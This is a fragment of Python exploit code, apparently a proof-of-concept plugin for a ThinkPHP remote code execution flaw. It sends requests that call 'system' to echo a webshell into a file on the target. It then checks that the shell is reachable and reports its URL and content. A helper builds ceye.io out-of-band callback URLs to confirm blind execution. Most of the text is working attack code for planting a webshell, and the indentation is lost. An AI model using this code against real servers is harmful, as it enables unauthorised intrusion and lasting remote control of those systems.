data_vars0_value = data["vars[0]"]
data_vars1_value = data["vars[1][]"]
get_string = "&" + "function" + "=" + data_function_value + "&" + "vars[0]" + "=" + data_vars0_value + "&" + "vars[1][]" + "=" + data_vars1_value
r = requests.get(vulurl + get_string)
r1 = requests.get(self.url + "/" + filename)
if r1.status_code == 200 and "green day" in r1.text:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + "/" + filename
result['ShellInfo']['Content'] = webshell
if not result:
#vulurl = self.url + r"/index.php?s=index/\think\template\driver\file/write&cacheFile={filename}&content={content}"
#vulurl = vulurl.format(filename=filename, content=quote(webshell))
data = p[1]
data[
"vars[1][]"] = "echo%20%27{content}%27%20>%20{filename}".format(
filename=filename, content=quote(webshell))
data["vars[0]"] = "system"
vulurl = self.url + p[0]
#requests.get(vulurl)
r = requests.get(self.url + "/" + filename)
#r = requests.get(vulurl + "&" + data)
if r.status_code == 200 and "green day" in r.text:
result['ShellInfo'] = {}
result['ShellInfo']['URL'] = self.url + "/" + filename
result['ShellInfo']['Content'] = webshell
return self.parse_output(result)
def build_request(self, value):
"""
生成发送的字符串
:param value: 输入的要发送的信息
:return: dict { url:返回接收的域名,flag:返回随机的flag }
Example:
{
'url': 'http://htCb.jwm77k.ceye.io/htCbpingaaahtCb',
'flag': 'htCb'
}
"""
if not self.check_account():
return {"url": "", "flag": ""}
ranstr = random_str(4)
domain = self.getsubdomain()
url = "http://{}.{}/{}{}{}".format(ranstr, domain, ranstr, value,
ranstr)
return {"url": url, "flag": ranstr}